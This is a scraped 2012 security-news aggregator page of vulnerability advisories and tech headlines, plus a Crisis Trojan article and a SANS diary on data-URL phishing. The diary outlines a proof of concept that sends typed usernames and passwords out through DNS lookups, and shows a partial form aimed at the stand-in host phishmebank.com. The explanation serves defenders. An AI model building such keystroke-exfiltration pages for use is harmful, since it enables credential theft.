InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
A California judge's order that Oracle must keep porting its software to Hewlett-Packard's Itanium platform is now final, setting the stage for a jury trial over whether Oracle breached a contract with HP and what damages it may need to pay.
Elxis CMS Multiple Cross Site Scripting Vulnerabilities
The U.S. Republican Party has approved a policy statement that focuses on removing regulations and protects personal data on the Internet.
Basic Java sandboxing has been around since 1995, but flaws in the Java virtual machine are highly targeted. Experts are calling on Oracle to do more.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
[SECURITY] [DSA 2535-1] rtfm security update
Salesforce.com has revealed details of what's coming in its next major product update, Winter '13, in a set of release notes recently posted on its website.
Oracle knew since April about the existence of the two unpatched Java 7 vulnerabilities that are currently being exploited in malware attacks, according to Adam Gowdiak, the founder and CEO of Polish security firm Security Explorations.
Re: [SE-2012-01] information regarding recently discovered Java 7 attack
Motorola Mobility and Verizon Wireless have scheduled a press conference for Sept. 5 in New York City, reportedly to unveil a new Droid Razr M smartphone.
Samsung announced an ambitious line of Windows 8 mobile devices using the Ativ name on Wednesday, including an ATIV S smartphone with a 4.8-in. HD display and three tablet PCs.
Stardock today released a beta version of its "Start8" utility that restores a Start button to the desktop of Windows 8.
Sistem Biwes Multiple Vulnerability
[ MDVSA-2012:147 ] mozilla-thunderbird
GE Proficy Historian 'KeyHelp.ocx' ActiveX Control Remote Code Execution Vulnerability
Seeker Adv MS-06 - .Net Cross Site Scripting - Request Validation Bypassing
Re: [Full-disclosure] [SE-2012-01] information regarding recently discovered Java 7 attack
If Apple uses a new, thinner display in its next iPhone, the battery could pack as much as 40% more capacity than the current 4S, said Shawn Lee, a research director at DisplaySearch.
ZDI-12-177 : (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability
EMC ApplicationXtender Multiple Products Arbitrary File Upload Vulnerability
ZDI-12-181 : Novell iPrint nipplib.dll client-file-name Parsing Remote Code Execution Vulnerability
ZDI-12-178 : (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability
The legal battle between Apple and Samsung Electronics may continue for another year or more despite a jury verdict on Friday that appeared to hand the iPhone maker a solid win. But the wrangling isn't likely to delay Apple's next big product.
As is somewhat typical of emerging technologies, there isn't a universally agreed to definition of what is meant by software defined networking (SDN). Over the last year or two most of the definitions have focused on the decoupling of the network control plane from the network forwarding plane.
Mozilla has detailed the security vulnerabilities it has fixed with the recent release of version 15 of Firefox and Thunderbird. The closed holes include seven Critical vulnerabilities in Firefox, five of which affect Thunderbird as well

ZDI-12-176 : (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability
ZDI-12-172 : (0Day) HP Operations Orchestration RSScheduler Service JDBC Connector Remote Code Execution Vulnerability
Sony Mobile today announced three new smartphones and a 9.4-in. Android 4.0 tablet at the IFA show in Berlin.
The U.S. Air Force is openly soliciting technologies that would improve its capability of launching cyberattacks and gathering intelligence during cyberwarfare operations.
Attackers using two recently-uncovered Java unpatched vulnerabilities, or 'zero-days,' have quickly expanded their reach by going mainstream, security experts said today.
Recent updates to the Apache OpenOffice and LibreOffice producivity suites close multiple heap-based buffer overflow vulnerabilities that could be exploited by a remote attacker to execute malicious code

With the current highly critical Java 0day vulnerability, The H has disabled its Update Check service so as not to encourage readers to install Java

ZDI-12-179 : EMC ApplicationXtender Desktop Viewer AEXView ActiveX AnnoSave Remote Code Execution Vulnerability
ZDI-12-173 : (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability
ZDI-12-171 : (0Day) Hewlett-Packard Intelligent Management Center UAM sprintf Remote Code Execution Vulnerability
ZDI-12-168 : InduSoft Thin Client ISSymbol InternationalSeparator Remote Code Execution Vulnerability
A federal judge rejected the efforts of BancorpSouth to use contractual agreements with customers as a shield against liability claims stemming from an online heist of some $440,000 that was illegally wire-transferred from the account of one of the bank's commercial customers in March 2010.
Ready or not, it is time for corporate legal and MIS departments to accept the fact that real and unique corporate Electronically Stored Information (ESI) resides on mobile devices such as iPhones, Blackberrys and tablets. Until recently, most lawyers exempted these devices from preservation and collection obligations with a wide variety of arguments; too difficult, redundant content, inaccessible, lack of explicit caselaw and bipartisan agreements. The rise of the mobile workforce, integrated communications, mobile apps and more have combined to make smart phones and tablets critical sources of unique ESI for corporate executives and other critical personnel. If we accept that mobile devices must be preserved and collected for civil discovery, then we get to the hard question of how to do it.
Sony will launch a flat-panel television around the world later this year that has more than four times the number of pixels than today's high-definition TVs.
A judge has allowed privacy group Consumer Watchdog to move forward with an effort to oppose a $22.5 million privacy settlement between Google and the U.S. Federal Trade Commission.
The U.S. Republican Party has approved a policy statement that focuses on removing regulations and protects personal data on the Internet.
t2â?²12: Challenge to be released 2012-09-01 10:00 EEST
[ MDVSA-2012:146 ] firefox
XSS in PrestaShop
Cross-Site Scripting (XSS) in Phorum
Google has started publicly testing an initial set of enterprise social networking (ESN) features for Google+, adding a key collaboration component for Google Apps customers.
The 0Day for Java affects Java 7 on all platforms in all browsers. Users should disable Java applets to protect themselves as the exploit is out in the wild and no patch is currently available

A second alleged hacker has been arrested in connection with an attack on Sony Pictures by LulzSec in June 2011, in which the hactivist group claimed to have obtained more than one million data records

ToorCon 14 Call For Papers
TomTom plans to launch a navigation app for Android smartphones in October, the company said Wednesday at the IFA trade show in Berlin.

Last week, when Symantec researchers said they had discovered the Windows version of the Crisis Trojan could spread to VMware virtual machines, it was big news. But Trend Micro doesn’t see Crisis as a major threat for enterprises using VMware. In fact, executives at the company think Crisis’s potential to spread to virtual machines was overblown.

“There was a fair amount of hype,” Harish Agastya, director of product marketing for data center security at Trend Micro, told me in a meeting this week at VMworld in San Francisco.

The Crisis malware only impacts Windows-based Type2 hypervisor deployments, not Type 1 hypervisor deployments, which are what most enterprises use, he said. “It’s specific to Type 2,” he said.

Warren Wu, director of product group management in the data center business unit, wrote a blog post that provided more details on the different deployments and attack scenarios. Here’s his description:

Type 1 Hypervisor deployment – Prime examples are VMware ESX, Citrix Xensource etc. It would help to think of these products as replacing the Host OS (Windows/Linux) and executing right on the actual machine hardware. This software is like an operating system and directly controls the hardware. In turn, the hypervisor allows multiple virtual machines to execute simultaneously.  Almost all data center deployments use this kind of virtualization. This is NOT the deployment this malware attacks. I’m not aware of malware capable of infecting Type 1 Hypervisors in the wild.

Type 2 Hypervisor deployment – Example VMware Workstation, VMware Player etc. In this case the hypervisor installs on TOP of a standard operating system (Windows/Linux) and in turn hosts multiple virtual machines on top. It is this second scenario that the malware infects. First, the host operating system is compromised. This could be a well-known Windows/Mac OS attack (with the only added wrinkle being the OS is detected and the appropriate executable is installed). It then looks for VMDK files and probably instantiates the VM (using VmPlayer) and then uses the same infection as that used for the Host OS. This type of an infection can be stopped with up-to-date, endpoint antimalware solutions.

What makes Crisis unique, Wu wrote, is that it specifically seeks out virtual machines and tries to infect them. It also infects the VM through the underlying infrastructure by modifying the VMDK file instead of infecting the VM through more conventional avenues such as file shares, he said.

Trend Micro has made a name for itself in virtualization security, so what the company is saying about Crisis carries a lot of weight. Trend Micro was the first security vendor to partner with VMware and produce an agentless antivirus product. At VMWorld, the company launched the latest version of its Deep Security server security platform, which provides anti-malware and firewall protection, intrusion prevention and integrity monitoring to protect virtual servers and desktops.

The new version features caching and de-duplication functions to reduce file scanning and improve performance and hypervisor integrity monitoring. Deep Security 9 also includes integration with VMware’s vCloud Director and Amazon Web Services. That integration combined with a unified management console will enable customers to manage security of their physical, virtual and cloud servers from a single console, Agastya said.

Trend also launched Trend Ready for Cloud Service Providers, a program that provides certification that Trend Micro’s cloud security products – Deep Security and Secure Cloud– are compatible within a service provider’s environment, said Scott Montgomery, global strategic director of cloud provider business development at Trend. AWS, Dell, HP Cloud Services and Savvis are among the cloud service providers that have received the Trend Ready designation.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
RETIRED: Novell ZENWorks 'LaunchHelp.dll' ActiveX Control Remote Code Execution Vulnerability
The use of data URLs in cross site scripting and other attacks isn't exactly new. But the concept is still not widely known, and keeps getting rediscovered. The latest iteration is a paper outlining the use of data URLs in server less phishing [1]. (thanks to our reader Tor for pointing this paper out)
data URLs are defined in RFC 2397 (published 1998! ancient internet history) and implemented in all browsers I am aware off. I remember actually using them back in the old days to embed images in some of my early CGI scripts, before I figured out better ways to do this.
The syntax is pretty simple:
The trick is that the data URL doesn't point to a remote document like a traditional URL, but instead it includes all the data needed to display the page. Here are two examples:a small image. and a simple HTML page.You can create your own data URLs easily at the Data URI Kitchen [1] .
You can probably see how it wouldn't be too hard to come up with a half way convincing phishing page. The problem is that there are few defenses against this type of phishing. The web browser will not connect to any external resource to display the phish, unless images are included from remote sites (they could also be embedded). The only limit is whatever size limit to URLs the browser imposes.
From a phishing perspective, this will allow inserting the form, but you will still need a web server to receive the data. Unless of course, you can exfiltrate this via DNS. Here is a little proof of concept HTML / javascript to accomplish this. The image loaded here doesn't actually exist, and the only thing we are interested in is the DNS request sending the username and password as it is typed:

form action=http://phishmebank.com
Username: input type=text name=user onkeydown=
Password: input type=password name=pass onkeydown=
Did I mention that you should REALLY watch your DNS and HTTP proxy logs (this would not show up in your proxy logs if the DNS query returns NXDOMAIN)


Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
The market for these systems is getting crowded, but the only way to attract customers to them is to make them inherently safe.
In an effort to improve how MongoDB supplies its data to external applications, MongoDB keeper 10gen has extended the open source data store's query language, providing developers with more sophisticated ways to extract and transform data.
If you want to blog, or manage a blog, from your iPad, you could use your blog platform's web page editor. But it's unlikely that interface has been optimized for the iPad's screen. Enter Posts, a $10 iPad app from Pico that lets you create, edit and view posts on blogs using Blogger or WordPress. (For the latter, it works with blogs hosted on wordpress.com as well as self-hosted WordPress blogs.)
op5 Monitor HTML Injection and SQL Injection Vulnerabilities
New containerization technologies can help BYOD initiatives succeed by creating separate spaces on smartphones for work and personal use.
New Zealand's High Court ruled on Wednesday that Megaupload can take out a $4.8 million loan to pay its legal bills and rent for founder Kim Dotcom.
The Japanese government on Wednesday hosted a panel in Tokyo on allowing emergency '911' calls to be placed through social networks such as Twitter during natural disasters.
IBM and Hewlett-Packard tied for the top position in server factory revenue in the second quarter, with a 29.2% and 29.6% share respectively, IDC said on Tuesday.
A 20-year-old man surrendered to FBI agents on Tuesday for his alleged hacking of Sony Pictures, one of a wave of attacks executed last year by the hacking collective LulzSec.
Integration between Zend Server PHP and VMware vFabric Application Director automates process of moving from virtualized to cloud environments
Mono ASP.NET Web Form Hash Collision Denial Of Service Vulnerability
In the seven years since Katrina struck New Orleans, advances in computer power and storm surge modeling is giving the city detailed data about Hurricane Isaac's impact.
Columnist John Webster says big data promises of a style of computing that more closely mimics the functioning of the human mind. For IT, that means moving from provisioning of services to making a big impact on business results.
The latest version of Mozilla's open source email client allows users to instant message their contacts in real time, adds support for the Do Not Track header and implements a new user interface based on Firefox's upcoming Australis theme

A programming flaw renders Java's entire elaborate security model ineffective because the exploit simply disables the security components

MIPS Technologies hopes to challenge ARM in the market for high-end tablets and smartphones with an upcoming processor design it presented at the HotChips conference in Silicon Valley on Tuesday.
A court in California has scheduled a hearing for Dec. 6 on Apple's request for a permanent injunction against eight Samsung phones, according to court papers filed Tuesday. Meanwhile, the court will hear next month Samsung's plea to vacate an earlier preliminary injunction against its Galaxy Tab 10.1.
Oracle Outside In Technology CVE-2012-1768 Remote Code Execution Vulnerability

Posted by InfoSec News on Aug 28


By Brian Donohue
Threat Post
August 28, 2012

The Air Force Life Cycle Management Center (AFLCMC) posted a broad
agency announcement [PDF] recently, calling on contractors to submit
concept papers detailing technological demonstrations of ‘cyberspace
warfare operations’ (CWO) capabilities.

The Air Force is looking to obtain CWO capabilities falling into a...

Posted by InfoSec News on Aug 28


By Andy Greenberg

When lock maker Onity first responded last month to news that a hacker’s
exploit could open millions of its keycard locks installed on hotel room
doors around the world, it downplayed the attack on its hardware as
“unreliable, and complex to...

Posted by InfoSec News on Aug 28


By Sean Gallagher
Ars Technica
Aug 28 2012

When Libyan rebels finally wrested control of the country last year away
from its mercurial dictator, they discovered the Qaddafi regime had
received an unusual gift from its allies: foreign firms had supplied
technology that allowed security forces to track nearly all of the...

Posted by InfoSec News on Aug 28


By Elinor Mills
Security & Privacy
August 28, 2012

A group of hackers has released a vast quantity of data from banks,
government agencies, consulting firms and many others and promised more
data leaks in the future.

"Team GhostShell's final form of protest this summer against the banks,
politicians and for all the fallen...

Posted by InfoSec News on Aug 28


Project On Government Oversight
Aug 28, 2012

After an embarrassing breach of security at the Y-12 National Security
Complex in July, the Project On Government Oversight has learned that
the Department of Energy’s Office of Independent Oversight Program (IO)
will conduct a full review of security at Y-12 before the end of this
Internet Storm Center Infocon Status